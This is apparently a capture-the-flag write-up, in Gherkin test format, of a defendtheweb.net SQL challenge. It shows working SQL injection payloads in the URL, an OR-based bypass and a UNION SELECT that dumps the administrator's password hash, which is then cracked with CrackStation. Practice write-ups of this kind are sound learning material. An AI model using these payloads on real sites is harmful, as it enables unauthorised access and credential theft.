## Version 2.0
## language: en
Feature: 02-bronze-SQL-defendtheweb.net
  Code:
    02
  Site:
    www.defendtheweb.net
  Category:
    Bronze - SQL
  User:
    juan6630
  Goal:
    Retrieve the administrators password.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Windows 10      | 20H2        |
    | Mozilla Firefox | 85.0.2      |
  Machine information:
    Given I start the challenge with the following URL
    """
    https://defendtheweb.net/playground/sqli2
    """
    And I see a login page [evidence](page.png)

  Scenario: Fail: Common SQL injection
    Given I have access to the challenge's website
    When I try some basic injections
    Then I get a login details error
    And I decide this can't be done

  Scenario: Fail: URL SQL injection
    Given I have a website
    When I use the 'Browse members' option
    And I notice that the query is in the URL
    """
    https://defendtheweb.net/playground/sqli2?q=D
    """
    When I change the end to <<q='pass'>>
    Then I get a debug error
    """
    DEBUG: SELECT username, admin FROM members WHERE username LIKE ''pass'%'
    """

  Scenario: Success: URL SQL injection
    Given I have the SQL query used by the website
    When I change the URL to
    """
    https://defendtheweb.net/playground/sqli2?q=' OR admin = 1;
    """
    Then I get the admin's username [evidence](admin.png)
    And I decide to use <<UNION>> to retrieve the password
    When I change the URL to
    """
    https://defendtheweb.net/playground/sqli2?q='UNION
    SELECT password, admin FROM members WHERE admin = 1;
    """
    Then I get the hash of the password [evidence](hash.png)
    And I use crackstation to decode it [evidence](password.png)
    """
    https://crackstation.net/
    """
    And I solve the challenge
